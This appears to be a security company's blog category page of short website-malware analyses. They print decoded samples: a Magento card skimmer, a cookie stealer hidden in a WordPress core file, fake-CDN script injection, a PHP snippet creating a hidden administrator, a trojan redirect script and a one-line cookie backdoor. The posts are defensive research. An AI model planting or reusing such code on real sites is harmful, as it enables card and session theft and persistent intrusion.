Category: Website Malware Infections

Client-Side or Server-Side Script?

We’ve already described several times how credit card stealing malware hides a data collecting script behind an image URL. When people see URLs that end with .jpg, .png, or .gif they normally don’t expect them to do anything malicious. Third-party JavaScripts are much more suspicious, still it is possible to use them in a way to coax webmasters into considering them benign.

When checking yet another credit card stealing JavaScript injected into the /js/ccard.js file in Magento, we noticed this line:


e294b002686cad2df01bb59e3e2299f3e:'hxxps://informaer[.]net/js/info_jquery.js',

JS script in a malicious injection is always suspicious to us. Especially when it has the word jquery in it and some unknown domain (with a typo). When we opened that URL, the only content we found there was:

jQuery.noConflict();

NoConflict() is the function that tells jQuery library to restore the original value of the “$”, which allows you to use other JS libraries that use “$” as a function or variable name alongside with jQuery. The code is definitely benign.

But let’s check how this "informaer" URL is used by the script.

...var http=new XMLHttpRequest();http.open('POST',be20b6410993ea4c7a48767775856514b.e294b002686cad2df01bb59e3e2299f3e,true);http.setRequestHeader('Content-type','application/x-www-form-urlencoded');http.send('info='+keym+'&hostname='+domm+'&key='+be20b6410993ea4c7a48767775856514b.myid);

It turns out that the URL is actually not a static JavaScript file. It’s a server-side script that receives data from filled out checkout forms passed in the info parameter of a POST request. It’s actually the collector of the stolen data. However, if you don’t use the POST method and don’t pass correct parameters, it pretends to be a benign JavaScript. It even sets the Content-Type: application/javascript; charset=utf-8 header to make it look plausible.

Hackers may go an extra mile to make their resources look benign, but as a webmaster you should never rely on what code looks like. Instead, verify whether it belongs to your site or not by answering two questions: 1. Did I put it there? If no then 2. Is this code a part of the third-party software I installed? To answer the second question, compare it to the original third-party software (get it either directly from the developer or from your clean backup copy). If answers to both of these questions are NO then no matter how benign the code looks, most likely it was placed there as a result of the site compromise. Integrity control may help you easily identify such unauthorized code injections.

If malware detection and removal still sound too complex for you, Sucuri is here to help.

May 3, 2017 by Denis Sinegubko

WordPrssAPI Steals Your Cookies

Cookies are an important part of a visiting session on a website. It is used not only to keep track of actions taken on a specific website by a particular user, but also its login sessions. Having those cookies stolen can easily lead to a compromise of any admin area you visit and allow the attacker to know what you did on that specific website.

These types of attack (Cookie Stealing and Session Hijacking) are not the most common ones due to the complexity involved in the process and because they are usually time sensitive (cookie expiration).

During an incident response investigation, we found a Cookie Stealing malware pretending to be working with one of WordPress’s core domains. Hackers injected an obfuscated (typical eval(function(p,a,c,k,e,d) obfuscation) JavaScript code at the bottom of legitimate .js files such as wp-includes/js/hoverIntent.min.js. Once decoded we see the following:


function adsadsgg() {  var gd = document.cookie.indexOf("_utmzz=");  if (gd == -1 && (/Applebot|baiduspider|Bingbot|Googlebot|ia_archiver|msnbot|Naverbot|seznambot|Slurp|teoma|Yandex|Yeti/i.test(navigator.userAgent) == false)) {     var rd = Math.floor(Math.random() * 2);     if (rd == 0) {          var sss = document.createElement('script');         sss.src = "hxxps://code.wordprssapi[.]com/ajax/json.aspx?c=" + escape(document.cookie);            document.body.appendChild(sss)      }       var dd = new Date();        dd.setTime(dd.getTime() + 86400000);        window.document.cookie = "_utmzz=ga; expires=" + dd.toGMTString() }}if (typeof(jQuery) != 'undefined') {  jQuery(function() {     adsadsgg()  })} else {  window.onload = function() {        adsadsgg()  }}

In the snippet above, we can see that the stolen cookie data is being sent to the fake domain code.wordprssapi[.]com (see the typo?) which is a way to trick people into thinking that it actually sends it an official WordPress domains, which it is not. And by the way code.wordprEssapi.com also has nothing to do with real WordPress. Actually, even if it was an official WordPress domain, sending your cookies to it would be a big red flag! It’s a private information that should not be shared with any third-parties. Like passwords.

The attackers also went the extra mile to ensure that they do not receive any cookie information from crawlers and bots such as Googlebot so that they only receive data that can be immediately used.

As the malicious code was injected into a WordPress core file, a quick integrity check would alert the user about the issue. For more detailed instructions on how to clean a hacked WordPress site check our step-by-step guide.

Apr 25, 2017 by Cesar Anjos

Titles, Imprints and Marks Left by Attackers

Some attackers seem to like signing their scripts. This fact is especially true for defacements and backdoors, where attackers show their pride stating that they “owned” a site by signing their own malware. Sometimes they write their expressions and nicknames on the title or in the middle of the file:


<title>Ow3nd </title><center><div id=q>Your Site Has Been Ow3nd By ...

Or like in this malware sample:

<title>#Pwned</title><p> ... </p><h3> ... ownz you</h3> ...

Or even the classic one:

<title>Hacked by …

We have seen thousands of defacement title variations (and even more backdoor patterns), and still we find new variations every day.

By looking at a file's title, we may be able to tell if a file is malware. Though, most of the times, finding malware requires much deeper scanning, decryption and deobfuscation processes, making the task to be difficult and time consuming. If you don’t use such a scanning and want to make sure you didn’t miss any defacements or backdoors on your server, you can have us scan your site for thousands of different malware patterns.

Apr 18, 2017 by Jose Martinez

WebSockets, Viagra and Fake CloudFlare CDN

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page which appear 15 seconds after browsing the website. Those banners are being generated due to the following code being injected into the theme’s function.php files:

function add_js_scripts() {
    wp_enqueue_script('js-rws', 'hXXp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1[.]0[.]0/reconnecting-websocket[.]js', '', null, true);
    wp_enqueue_script('js-cors', 'hXXp://cloudflare[.]solutions/ajax/libs/cors/cors[.]js', '', null, true);
}

add_action( 'wp_enqueue_scripts', 'add_js_scripts' );
add_action('admin_enqueue_scripts', 'add_js_scripts' );
add_action('login_enqueue_scripts', 'add_js_scripts' );

The code above uses WordPress core functions like wp_enqueue_script and add_action to inject external scripts into all WordPress pages (including admin and login pages).

The third-party scripts load from what looks like a CloudFlare CDN. And if you open the cloudflare[.]solutions site, you’ll see it says "This Server is part of Cloudflare Distribution Network." However, WHOIS says that the domain had been registered just on February 11, 2017 to a Russian company, Legato LLC and is now hosted in Ukraine on a server with IP 78.109.28.70.

The first injected script reconnecting-websocket.js is a copy of a legitimate ReconnectingWebSocket library. It’s not malicious. But the second injected script cors.js is more interesting. After decoding it, you may notice that it has a list of banner images saved on imgur.com image hosting.

var banners=[];
var bannercount=0;
var bannersSrc=["hXXPs://i.imgur[.]com/gXcct1z[.]jpg","hXXPs://i.imgur[.]com/FAdidSx.jpg","hXXPs://i.imgur[.]com/fGOvfDF.jpg","hXXPs://i.imgur[.]com/MjWLkNB.jpg","hXXPs://i.imgur[.]com/3On9O6O.jpg","hXXPs://i.imgur[.]com/cdBEiDU.jpg","hXXPs://i.imgur[.]com/xyKxCFG.jpg","hXXPs://i.imgur[.]com/BRSxZ96.jpg","hXXPs://i.imgur[.]com/NfyV72o.jpg","hXXPs://i.imgur[.]com/fcHTBav.jpg","hXXPs://i.imgur[.]com/5SsJqTM.jpg"];
var mobileBanners=["hXXPs://i.imgur[.]com/KRqvxk4.jpg","hXXPs://i.imgur[.]com/84mQCt4.jpg","hXXPs://i.imgur[.]com/hyblTs8[.]jpg","hXXPs://i.imgur[.]com/85tjX88.jpg"];

The script downloads the images, then waits for 15 seconds and loads them as banners that lead you to www[.]orderrealviagra[.]cc., rotating the images for every new page load. If a user clicks on the banner, or closes it (the banners have the close [x] button), the script sets the adwords-cookie-settings for the next 7 days and won’t show the banners for browsers with this cookie.

An interesting and quite rare feature of this script, is that it uses WebSocket protocol (that’s why they also inject the reconnecting-websocket.js library) instead of HTTP to communicate with its server: wss://cloudflare[.]solutions:8085 that uses a custom set of commands:

socket.send("cb*" + navigator.userAgent)
socket.send("rts*" + navigator.userAgent)
socket.send("rsbl*" + navigator.userAgent)
socket.send("msbl*" + navigator.userAgent)

Using new generic TLDs like .solutions is still quite uncommon. But not on this server. A reverse IP lookup revealed only one other site on this server (ardf[.]world) that also happen to use a new generic TLD (.world). Do these sites have the same owner or is it just a coincidence?

This case proves that malware may hide behind legit-looking URLs and you should carefully review all third-party resources that your site loads. Don’t forget that theme files are a very popular target for malware injections (the most popular for attacks that use stolen/bruteforced WordPress credentials) and you should monitor their integrity. Unauthorized changes are a strong indicator of a hack.

If you see your site showing unwanted banners or popups but can’t locate their source, you might want to have us scan your site for malware and clean it.

Apr 3, 2017 by Fernando Barbosa

Attackers Silently add new user with Administrator role...

Attackers tend to get smarter in order to avoid detection, as well as gain access to your WordPress site. They use legit functions of the WordPress core to create users, post spammy content, and other kinds of malicious activities.


Most of the cases where legit functions are used, attackers avoid combining that with obfuscation techniques to reduce the chances of being detected by antivirus solutions and regular scanners.

One case that we recently researched was just like that. The attacker placed a PHP script inside the root directory of the WordPress installation and included the wp-load.php file that gave him access to the core functions.

$wp_load_loc = "wp-load.php";require_once($wp_load_loc);

After loading the file, it is easy to create a WordPress user and set the role to administrator via the core functions.

$user_id = wp_create_user('username987', 'password987');$user = new WP_User($user_id);$user->set_role('administrator');

Having the administrator role allows attackers unlimited possibilities to harm your site and business. They can lock you out from the backend, and if you aren’t logging in very often, nor performing any security checks, these bogus ‘Administrator’ users could go undetected for a long time.

If you’ve noticed any suspicious activity, or your website recently got blacklisted, this could be an indication that something may be wrong. We highly recommend contacting a professional to  investigate the issues for you.

Mar 16, 2017 by Yuliyan Tsvetkov

doc.google.com.TROJAN

During an incident response process, we identified some files located at a website’s root folder. Although they had different filenames (post.php, news.php, home.php, etc), they had the same malicious content:


<?php$dom = array('www[.]edgefinance[.]co[.]za','www[.]capitalregioncog[.]org','contas[.]cnt[.]br','boletim[.]contas[.]cnt[.]br','www[.]capitolregionwd[.]org','bolivarcarrillo[.]udem[.]edu[.]ni','foodscience[.]keio[.]ac[.]jp','www[.]keprate[.]com','rosaliarios[.]udem[.]edu[.]ni','www[.]armd-france[.]org','luispalacios[.]udem[.]edu[.]ni','www[.]kepak[.]com','candramustika[.]unja[.]ac[.]id','appserver[.]guabiruba[.]sc[.]gov[.]br','luiscanales[.]udem[.]edu[.]ni','rawahil[.]com','avai[.]com[.]br','boletin[.]ucv[.]edu[.]pe','preview[.]table59[.]co[.]uk','jorgemendoza[.]udem[.]edu[.]ni','apps[.]timeslive[.]co[.]za','www[.]uaec[.]ufcg[.]edu[.]br','jornadasmediterraneas2014[.]atlantacongress[.]org','www[.]inmune[.]cl','www[.]dees-groep[.]nl','sporternaehrung[.]global-nutrition[.]de','www[.]afonsolopes[.]com','geomorfo[.]criba[.]edu[.]ar','wordpress[.]hockeyreno[.]com','ideation[.]attero[.]in');
$url = 'hXXp://'.$dom[mt_rand(0,sizeof($dom)-1)].'/file.php';if (strlen($_SERVER["QUERY_STRING"])>1) {$file=@file_get_contents($url.'?aaaa');header ("Content-Type: image/jpeg");echo $file;} else {header('Location: '.$url);}exit;?>

This kind of malicious code is very familiar to us. It is part of a malicious campaign where different sites are used as a redirect chain that’ll lead to the spam or malware page. This technique is used as an evasion method allowing the attacker to keep a fresh site (not blacklisted) at the end of the chain.

The code, when accessed, will test if the $_SERVER["QUERY_STRING"] is bigger than 1, meaning that if no parameter is passed, it’ll load some image from the url. However, if any parameter is passed to the  file.php, it’ll redirect the browser, proceed onto the download of a doc.google.com file, which is a trojan expected to be executed in Windows machines. You can find more information about that trojan file here.

If you are experiencing such redirects, this could be the reason why. We highly recommend checking your site against our free scanner Sitecheck, and if you need any help identifying and cleaning it up, you can let us know.

Mar 14, 2017 by Fernando Barbosa

Set your Cookie, Execute a Command

Backdoors evolve. They tend to get more complex, harder to understand and harder to decode, but this is not always the case.


Most of the backdoors rely on PHP-enabled engine options that allow execution of commands. Also, those options depend on some of the core functionalities of most of the CMS systems out there.

The case today was different. The backdoor was so tiny that by overlooking some of the file names on your website you can easily miss it.

<?php if (isset($_COOKIE["i5o8vz"])) @$_COOKIE["cmd"]($_COOKIE["i5o8vz"]);

It is a really simple, yet powerful backdoor. The attacker who placed it on your website sets his cookie so he can execute the command in the payload of the cookie, and as we know, setting a cookie is a piece of a cake. Also, $_COOKIE or $_POST variables are used as a “cloaking method” once they are not logged by default on access_logs, like $_GET, making it harder to detect anomalies when inspecting logs.

If you notice some suspicious activity on your website, or it is sending SPAM on its own, or even if you have been blacklisted by the major search engines, you can rely on us to clean and protect your website.

Mar 9, 2017 by Yuliyan Tsvetkov